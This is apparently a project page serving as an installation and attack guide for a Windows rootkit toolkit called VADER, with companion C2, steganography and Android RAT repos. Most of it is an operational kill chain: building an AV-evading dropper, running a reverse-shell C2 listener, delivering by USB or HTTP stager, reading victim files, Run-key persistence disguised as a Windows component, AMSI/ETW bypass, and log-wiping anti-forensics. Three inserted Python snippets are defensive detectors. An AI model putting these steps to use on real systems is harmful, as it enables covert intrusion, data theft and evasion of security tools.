// INSTALLATION & ATTACK GUIDE

Clone to kill chain. Everything verified against GitHub and local machine.

// PREREQUISITES

Requirement     | Version            | Purpose
Windows 11      | Build 26200+       | Target OS (tested on Home edition)
Visual Studio   | 2024/18 Community  | MSVC cl.exe for C compilation
Python          | 3.12+              | Build scripts, listeners, ghost encoder
Git             | Any                | Clone repos, version control
NASM            | 2.15+              | Assembly stubs for SithStalker gate engines
AUTHORIZED RESEARCH ONLY. Own hardware. Own network. Responsible disclosure via MSRC.

// STEP 1 — CLONE ALL REPOSITORIES

Six repos. Each handles a different layer of the kill chain.

vader-rootkit
Core implant framework — shell, Dark Room, cloak, dropper, injection, persistence, forensics
76 source files • cloak/ dark_room/ injection/ shell/ stagers/ forensics/ recon/ deploy.py
ghost-encoder
Zero-width Unicode steganographic encoder — file-level payload invisibility
ghost_encode.py • ghost_decode.py • ghost_selftest.py
sith-stalker
Indirect syscall engine (Hell's Gate / Halo's Gate) + concealment DLL hooks
src/gate.c gate_v2.c • cloak/hide_process.c hide_file.c hide_connection.c hook_engine.c
skywalker
Cold standby C2 — independent binary signatures, beacon mode, DLL search order exploits
beacon/sw_beacon_live.c sw_listener.py • disclosure/poc_*.c • deploy.py mutate.py
starkiller
Android RAT — C2 server + Kotlin client + obfuscation pipeline + binder
server/starkiller_c2.py • client/app/ (Kotlin) • obfuscate.py binder.py build.py
rainfantry.github.io
Portfolio — all documentation, dossier playbook, build tutorials, this guide
index.html rootkit.html ghost.html dossier.html guide.html + study pages
# Clone all repos (private — requires GitHub auth)
$ mkdir 22div && cd 22div
$ gh repo clone rainfantry/vader-rootkit
$ gh repo clone rainfantry/ghost-encoder
$ gh repo clone rainfantry/sith-stalker
$ gh repo clone rainfantry/skywalker
$ gh repo clone rainfantry/starkiller
$ gh repo clone rainfantry/rainfantry.github.io

// STEP 2 — BUILD THE DROPPER

vader_dropper.exe is the single-click kill chain. One compile produces everything.

2A Open Developer Command Prompt

# Open "Developer Command Prompt for VS" from Start menu
# OR manually load MSVC environment:
> "C:\Program Files\Microsoft Visual Studio\18\Community\VC\Auxiliary\Build\vcvars64.bat"

2B Compile All Binaries

$ cd vader-rootkit
$ python cloak/build_cloak.py --scan
VADER CLOAK — Build
===================
[+] Compiling cloak.dll          105 KB
[+] Compiling cloak_loader.exe   143 KB
[+] Compiling vader_dropper.exe  268 KB
[+] cloak.dll: CLEAN
[+] cloak_loader.exe: CLEAN
[+] vader_dropper.exe: CLEAN

2C Verify Build Output

$ ls cloak/bin/
cloak.dll          105 KB
cloak_loader.exe   143 KB
vader_dropper.exe  268 KB
# All three should report CLEAN against Defender.
# If any flag: run mutate.py to rotate XOR keys and recompile.
$ python mutate.py --rotate-keys

// STEP 3 — EXECUTE ATTACK (SINGLE-CLICK METHOD)

Fastest path. One EXE does everything: AMSI bypass, cloak, persistence, C2, screen capture.

3A Start C2 Listener (Attacker Machine)

# Terminal 1 — C2 listener
$ cd vader-rootkit
$ python cloak/c2_listen.py 53682
[*] VADER C2 — listening on 0.0.0.0:53682
[*] Waiting for connection...

3B Configure C2 Address

# Edit vader_dropper.c line 63-68 — change xC2Addr to your IP
# OR pass IP as command line argument when running:
> vader_dropper.exe 192.168.1.100 53682
Default C2 is 192.168.1.100:53682. Change xC2Addr XOR bytes for a compiled-in address, or pass IP:PORT as args.

3C Deploy to Target

# USB drop
$ copy cloak\bin\vader_dropper.exe E:\
# OR HTTP stager
$ python stagers/vader_serve.py --payload cloak/bin/vader_dropper.exe --port 8443
# Target downloads and double-clicks. No warnings. No prompts.

3D Automatic Kill Chain (Runs on Double-Click)

# This happens automatically inside vader_dropper.exe:
1. Sandbox check — RAM > 2GB, CPU > 1, Sleep timing real
2. Dynamic imports — XOR-decode API names, resolve via GetProcAddress
3. Dark Room — DR0 on AmsiScanBuffer, DR1 on EtwEventWrite
4. Cloak deploy — Decrypt cloak.dll, drop to %TEMP%, load, CBT hook
5. Persistence — Self-copy to APPDATA + registry HKCU Run key
6. C2 connect — Reverse TCP to your listener, auto-reconnect 5s
7. Interactive shell — Full command execution + screenshot capability

3E Operate via C2 Shell

# Connection appears in your listener:
[+] Connection from 192.168.1.50:49812
[+] Hostname: TARGET-PC | Cloak: ACTIVE
C:\Users\target>
# Available commands:
C:\> screenshot                        # grab desktop (raw BMP over socket)
C:\> dir C:\Users\target\Desktop       # browse files
C:\> type secrets.txt                  # read files
C:\> systeminfo                        # system enumeration
C:\> whoami /priv                      # privilege check
C:\> cd C:\Users\target\Documents      # navigate
C:\> exit                              # disconnect (auto-reconnects)

3F Verify Persistence (Reboot Test)

# From C2 shell — check registry key exists:
C:\> reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealthSystray
SecurityHealthSystray    REG_SZ    C:\Users\...\svchost_update.exe
# Reboot the target machine.
# Watch your listener — connection re-establishes on login.
[+] Connection from 192.168.1.50:49920 (reconnected after reboot)
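The defender-side counterpart to the check above, added here as an example and not code from the vader-rootkit project: it triages HKCU Run values for the pattern this step creates (an image under APPDATA registered under a Windows-component name). The sample entries, the USER_WRITABLE directory list and the SYSTEM_NAMES set are assumptions, not values from the page.

```python
import ntpath
import re

# Assumption: directories any user can write to; a Run image living here is a weak signal
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\programdata\\", "\\public\\")
# Assumption: real Windows binary names that dropped files like to borrow
SYSTEM_NAMES = {"svchost", "securityhealthsystray", "explorer", "csrss", "lsass"}

def extract_image(value):
    """Pull the executable path out of a Run value, quoted or not, ignoring arguments."""
    value = value.strip()
    m = re.match(r'"([^"]+)"', value)
    if m:
        return m.group(1)
    m = re.match(r"(\S+?\.(?:exe|dll|bat|cmd|ps1|vbs|js))(?:\s|$)", value, re.I)
    return m.group(1) if m else value.split()[0]

def triage_run_entry(name, value):
    """Score one Run entry; each reason is one point, higher means look first."""
    image = extract_image(value)
    low = image.lower()
    stem = ntpath.basename(low).rsplit(".", 1)[0]
    reasons = []
    if any(d in low for d in USER_WRITABLE):
        reasons.append("image in user-writable directory")
    if not low.startswith(("c:\\windows\\", "%windir%", "%systemroot%")):
        for n in SYSTEM_NAMES:
            if stem.startswith(n):
                reasons.append(f"file name mimics Windows binary '{n}' outside the Windows dir")
                break
        if name.lower() in SYSTEM_NAMES:
            reasons.append(f"value name '{name}' mimics a Windows component")
    return {"name": name, "image": image, "score": len(reasons), "reasons": reasons}

def triage_all(entries):
    """Rank (name, value) pairs, most suspicious first."""
    return sorted((triage_run_entry(n, v) for n, v in entries), key=lambda r: -r["score"])

# Constructed sample entries modelled on the reg query output above (paths are made up)
SAMPLE_RUN = [
    ("SecurityHealthSystray", r"C:\Users\target\AppData\Roaming\svchost_update.exe"),
    ("SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
    ("OneDrive", r'"C:\Users\target\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

if __name__ == "__main__":
    for r in triage_all(SAMPLE_RUN):
        print(r["score"], r["name"], r["image"], r["reasons"])
```

On a live host, feed the output of `reg query HKCU\...\Run` (or the `winreg` module) into `triage_all`; the legitimate OneDrive entry scores 1 and the dropped copy scores 3.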

// STEP 4 — ALTERNATIVE: GHOST-ENCODED PAYLOAD

For PowerShell-based delivery. Payload is invisible in the file — zero-width Unicode characters.

# Generate ghost-encoded VADER payload
$ cd ghost-encoder
$ python ghost_encode.py --vader --ip 192.168.1.100 --port 53682
[+] Generated VADER payload (persistence x3, screen capture, auto-reconnect)
[+] Ghost encoded → vader_ghost.ps1
[+] File appears BLANK in Notepad
# Deliver via HTA (double-click executes in browser)
$ python ghost_encode.py --hta --ip 192.168.1.100
# OR execute directly on target:
> powershell -ep bypass -File vader_ghost.ps1
Ghost encoding protects the FILE layer (static scan). Dark Room must be active for RUNTIME protection (AMSI bypass). The vader_dropper.exe method includes both automatically.

// STEP 5 — CLEANUP & MUTATION

# Anti-forensics — from C2 shell on target
C:\> vader_clean.exe
[*] Phase 1: Wiping persistence artifacts
[*] Phase 2: Clearing event logs
[*] Phase 3: Removing dropped files
[*] Phase 4: Scrubbing prefetch/shimcache
[*] Phase 5: Self-delete
[+] Clean.
# Mutate for next engagement — new signatures
$ cd vader-rootkit
$ python mutate.py --rotate-keys
$ python cloak/build_cloak.py --scan
[+] New XOR keys applied. All binaries recompiled. CLEAN.

// FILE MAP — WHAT LIVES WHERE

File                          | Repo                      | What It Does
vader_dropper.c               | vader-rootkit/cloak/      | Single-click EXE — AMSI bypass + cloak + persistence + C2 + screencap
build_cloak.py                | vader-rootkit/cloak/      | Compiles dropper + cloak DLL + loader, runs Defender scan
c2_listen.py                  | vader-rootkit/cloak/      | C2 listener — receives dropper connections
cloak.c + hide_*.c            | vader-rootkit/cloak/      | Concealment DLL — hooks NtQuery* to hide process/files/connections
hook_engine.c                 | vader-rootkit/cloak/      | Generic x64 inline hooking primitives (12-byte abs JMP + trampoline)
dark_room_annotated.c         | vader-rootkit/dark_room/  | AMSI/ETW bypass via HWBP — the technique that MSRC won't fix
vader_shell.c                 | vader-rootkit/shell/      | Standalone reverse shell (without dropper integration)
vader_inject.c                | vader-rootkit/injection/  | Process injector — HWBP all threads, CREATE_SUSPENDED mode
vader_clean_annotated.c       | vader-rootkit/forensics/  | Anti-forensics — 5-phase wipe + self-delete
vader_recon.ps1               | vader-rootkit/recon/      | Defender reconnaissance scanner
deploy.py                     | vader-rootkit/            | Unified deployment script — compile, scan, test, deploy
mutate.py                     | vader-rootkit/            | Polymorphic mutation — rotate XOR keys, recompile unique children
ghost_encode.py               | ghost-encoder/            | Zero-width Unicode steganographic encoder + VADER payload generator
gate_v2.c + gate_stub_v2.asm  | sith-stalker/src/         | Indirect syscall engine — XOR-encrypted hash table + MASM stubs
cloak/*.c                     | sith-stalker/cloak/       | Concealment layer source — BYOVD, DKOM, inline hooks
sw_beacon_live.c              | skywalker/beacon/         | Cold standby C2 agent — independent binary signatures
starkiller_c2.py              | starkiller/server/        | Android RAT C2 server + web dashboard

// FAREWELL — KEY KNOWLEDGE FROM THE BUILD

Everything learned building this toolkit. The concepts that matter. The traps to avoid.

THE TWO-LAYER PROTECTION MODEL
There are two fundamentally different problems: hiding payloads from static analysis (AV scanning files on disk) and hiding execution from runtime monitoring (AMSI scanning scripts in memory).
  • Ghost Encoding solves the FILE layer — payloads become invisible zero-width Unicode. No signatures to match. Files appear blank.
  • Dark Room solves the RUNTIME layer — hardware breakpoints on AmsiScanBuffer and EtwEventWrite. CPU debug registers, not memory patches.
  • You need BOTH. Ghost without Dark Room = payload decodes then AMSI catches it. Dark Room without Ghost = Defender catches the file before it runs.
  • vader_dropper.exe combines both automatically.
WHY HARDWARE BREAKPOINTS CAN'T BE FIXED
MSRC acknowledged this as VULN-195458 and won't fix it. Hardware breakpoints use CPU debug registers (DR0-DR3) — they're a CPU feature, not a Windows feature. Defender can't detect them because:
  • No memory is modified. No bytes patched. No VirtualProtect calls.
  • Debug registers are per-thread and only readable via GetThreadContext (which requires THREAD_GET_CONTEXT access to the target thread).
  • The Vectored Exception Handler is a legitimate Windows API. Thousands of applications use VEH for crash handling.
  • The only "fix" would be for Windows to prevent user-mode code from setting its OWN debug registers — which would break every debugger.
GHOST ENCODING IS NOT OBFUSCATION
Obfuscation transforms code to make it harder to understand. Ghost encoding doesn't transform anything — it represents data using characters that have zero visual width. The distinction matters:
  • Obfuscation can be reversed by analysis tools. Ghost encoding can't be "unobfuscated" because it was never obfuscated — the data is literally invisible.
  • AV signature scanners look for byte patterns. Ghost-encoded payloads contain zero known malicious byte sequences — every byte is a Unicode control character.
  • The payload only becomes "real" when decoded at runtime — at which point Dark Room has already blinded AMSI.
  • Ghost encoding is the FILE layer. Not a substitute for runtime protection.
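The file-layer property described here and in Step 4 (a script that looks blank because every code point is zero-width) is itself a strong static indicator, so a scanner does not need a byte signature for the payload. The detector below is an added example, not code from the ghost-encoder project; the thresholds and the sample texts are constructed assumptions.

```python
from collections import Counter

# Zero-width / invisible format characters commonly used to hide data in text
ZERO_WIDTH = {
    "\u200b": "ZWSP", "\u200c": "ZWNJ", "\u200d": "ZWJ", "\u2060": "WJ",
    "\ufeff": "ZWNBSP", "\u180e": "MVS", "\u2061": "FA", "\u2062": "IT",
    "\u2063": "IS", "\u2064": "IP",
}
MIN_ZW_COUNT = 64     # assumption: fewer than this is editor/BOM noise
MAX_RUN_ALLOWED = 16  # assumption: ordinary text never has long invisible runs

def analyze(text):
    """Score a text for zero-width steganography; returns counts and a verdict."""
    counts = Counter(c for c in text if c in ZERO_WIDTH)
    zw_total = sum(counts.values())
    visible = sum(1 for c in text if not c.isspace() and c not in ZERO_WIDTH)
    run = longest = 0  # longest consecutive run of zero-width code points
    for c in text:
        run = run + 1 if c in ZERO_WIDTH else 0
        longest = max(longest, run)
    ratio = zw_total / (zw_total + visible) if zw_total + visible else 0.0
    # A file that is mostly invisible code points, or carries one long invisible run,
    # is exactly the artifact a zero-width encoder leaves behind.
    suspicious = zw_total >= MIN_ZW_COUNT and (ratio > 0.5 or longest > MAX_RUN_ALLOWED)
    return {"zero_width_total": zw_total, "visible_chars": visible,
            "zero_width_ratio": round(ratio, 3), "longest_run": longest,
            "breakdown": {ZERO_WIDTH[c]: n for c, n in counts.items()},
            "suspicious": suspicious}

def scan_file(path):
    """Analyze a script file on disk; a lone BOM stays below the thresholds."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return analyze(fh.read())

# Constructed samples (not real payloads): a blank-looking file made of ZWSP/ZWNJ
# pairs, and an ordinary PowerShell script that only carries a leading BOM.
BLANK_LOOKING = ("\u200b\u200c" * 200) + "\n"
ORDINARY = "\ufeffWrite-Host 'hello'\nGet-Date\n"

if __name__ == "__main__":
    for name, sample in (("blank-looking", BLANK_LOOKING), ("ordinary", ORDINARY)):
        print(name, analyze(sample))
```

Pointing `scan_file` at a directory of .ps1/.hta files flags only those whose content is predominantly invisible, which is the detection profile the Ghost Encoder page refers to.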
XOR STRING ENCRYPTION — DEFENSE IN DEPTH
Every suspicious string in the dropper (API names, registry paths, filenames, C2 address) is XOR-encrypted in the binary:
  • Key 0xB5 for API function names (WSASocket, SetWindowsHookExA, AmsiScanBuffer)
  • Key 0xBE for operational strings (cmd.exe, C2 IP, registry path, persistence filename)
  • Strings are decoded to stack buffers at runtime, used once, then zeroed with memset()
  • A hex dump of the EXE reveals no suspicious strings — no "cmd.exe", no "HKCU\Software\...", no C2 IP
  • mutate.py rotates these keys and recompiles — every build has unique XOR encoding
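What an analyst gets back from a single-byte XOR scheme like the one described above, as an added example that is not part of the vader-rootkit toolkit: a one-byte key preserves the structure of ASCII, so trying all 255 keys and keeping printable runs recovers the strings without knowing the key. The sample blob is constructed here with the page's stated keys 0xBE and 0xB5; it is not taken from any real binary, and the marker list is an assumption.

```python
import re

MIN_RUN = 6  # assumption: printable runs shorter than this are mostly noise

def xor_bytes(data, key):
    """XOR every byte with a single-byte key (the scheme the page describes)."""
    return bytes(b ^ key for b in data)

def printable_runs(data, min_run=MIN_RUN):
    """Printable-ASCII runs, i.e. what `strings` would show for this buffer."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_run, data)]

def recover_strings(blob, markers=(".exe", "Software\\", "GetProc", "Socket")):
    """Try all 255 non-zero keys; return {key: runs} where a run contains a marker."""
    hits = {}
    for key in range(1, 256):
        runs = printable_runs(xor_bytes(blob, key))
        found = [s for s in runs if any(m.lower() in s.lower() for m in markers)]
        if found:
            hits[key] = found
    return hits

# Constructed sample blob: deterministic filler around two strings encoded with the
# page's keys (0xBE operational string, 0xB5 API name). Not bytes from any real binary.
FILLER = bytes(range(0, 240, 6))
SAMPLE_BLOB = (FILLER + xor_bytes(b"cmd.exe", 0xBE) + FILLER
               + xor_bytes(b"WSASocketA", 0xB5) + FILLER)

if __name__ == "__main__":
    for key, strs in sorted(recover_strings(SAMPLE_BLOB).items()):
        print(f"key 0x{key:02X}: {strs}")
```

Rotating the key per build changes which of the 255 candidates hits, not whether the brute force works; only a per-string or multi-byte key changes that picture.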
THE CONCEALMENT ARCHITECTURE
cloak.dll uses inline hooks on three NT functions to hide from the OS itself:
  • NtQuerySystemInformation — unlinks our process from the SYSTEM_PROCESS_INFORMATION linked list. Task Manager, tasklist, Process Explorer — all blind.
  • NtQueryDirectoryFile — unlinks our files from FILE_BOTH_DIR_INFORMATION. dir, Explorer, any file listing — blind.
  • NtDeviceIoControlFile — filters MIB_TCPROW entries matching our C2 port. netstat, TCPView — blind.
  • SetWindowsHookEx(WH_CBT) spreads cloak.dll system-wide automatically — one command and every GUI process is hooked.
DYNAMIC IMPORTS — STAYING OUT OF THE IAT
The Import Address Table (IAT) is the first thing a static analyzer checks. If your EXE imports WSASocket + SetWindowsHookEx + CreateProcess + AddVectoredExceptionHandler — that's a red flag profile.
  • vader_dropper.exe only shows GetProcAddress, LoadLibraryA, GetModuleHandleA, VirtualAlloc in its IAT — the same as any Windows application.
  • All suspicious APIs are resolved at runtime: XOR-decode the function name → LoadLibrary the DLL → GetProcAddress the function → store in a function pointer.
  • Registry functions (RegOpenKeyEx, RegSetValueEx) and GDI functions (BitBlt, GetDIBits) are left as direct imports — they're not suspicious. Thousands of legitimate apps use them.
WHAT DEFENDER ACTUALLY DETECTS (HONEST TRUTH)
  • Static scan — CLEAN. All 26+ binaries pass MpCmdRun. XOR encoding + dynamic imports + no known signatures = invisible to signature-based detection.
  • AMSI runtime — BYPASSED. Dark Room HWBP. MSRC confirmed won't fix.
  • ETW telemetry — BYPASSED. Same HWBP technique on EtwEventWrite.
  • Behavioral analysis — MINIMAL risk. All API calls are legitimate Windows functions used by thousands of apps. No process hollowing, no APC injection, no NtMapViewOfSection abuse.
  • Enterprise EDR — NOT tested. CrowdStrike, Carbon Black, SentinelOne use kernel-level telemetry (ETW-Ti, minifilters, callback registrations) that user-mode bypasses don't reach. The cloak hides from user-mode queries but kernel drivers can still see the process.
  • Network detection — Raw TCP egress on configurable port. No encryption, no domain fronting, no DNS tunneling. A network IDS watching for unusual outbound connections WILL see it. Future work: TLS wrapping.
ARCHITECTURE DECISIONS THAT MATTERED
  • C over Python for implants. No runtime dependency. No interpreter to detect. 268 KB standalone EXE vs Python requiring a 50MB runtime. C compiles to native code that blends with legitimate Windows binaries.
  • WinMain over main. /SUBSYSTEM:WINDOWS means no console window flashes when the dropper runs. Completely silent execution.
  • Embedded DLL over separate file. cloak.dll is XOR-encrypted inside vader_dropper.exe. One file to deploy, not two. Decrypted at runtime and written to %TEMP% — then deleted on exit.
  • Registry Run over Scheduled Tasks. HKCU Run key doesn't require admin. Scheduled tasks via COM are complex and create more forensic artifacts. Simple wins.
  • Raw BMP over JPEG for screenshots. No GDI+ dependency needed. Larger data (5.9 MB vs 200 KB) but simpler code and zero additional DLLs. The C2 listener can convert to JPEG.
  • Auto-reconnect with infinite retries. MAX_RETRIES = 0 means the dropper never gives up. Listener goes down, comes back up — dropper reconnects. Persistence through network disruptions.
// END OF TRANSMISSION
Six repositories. 76+ source files. 26 compiled binaries. Zero detections.
One MSRC disclosure. One kill chain. One single-click dropper.

Every layer exists for a reason. Every design decision has a "why."
The dossier is the playbook. This guide is the manual. The code is the proof.

From steganography to rootkit — the full chain, documented and operational.

22DIV / VADER / george wu

// QUICK LINKS

Page                | What
Landing Page        | Operations order + 8-phase learning path
Dossier / Playbook  | Operational kill chain + build-from-scratch tutorial + 7-day reading order
VADER Deep Dive     | Full technical breakdown of the rootkit framework
Ghost Encoder       | Zero-width steganography showcase + detection profile
Sith Stalker        | Indirect syscall engine documentation
Skywalker           | Cold standby C2 + DLL search order exploits
StarKiller          | Android RAT documentation
Kill Chain Studies  | CSEC cybersecurity coursework + Cyber Kill Chain mapping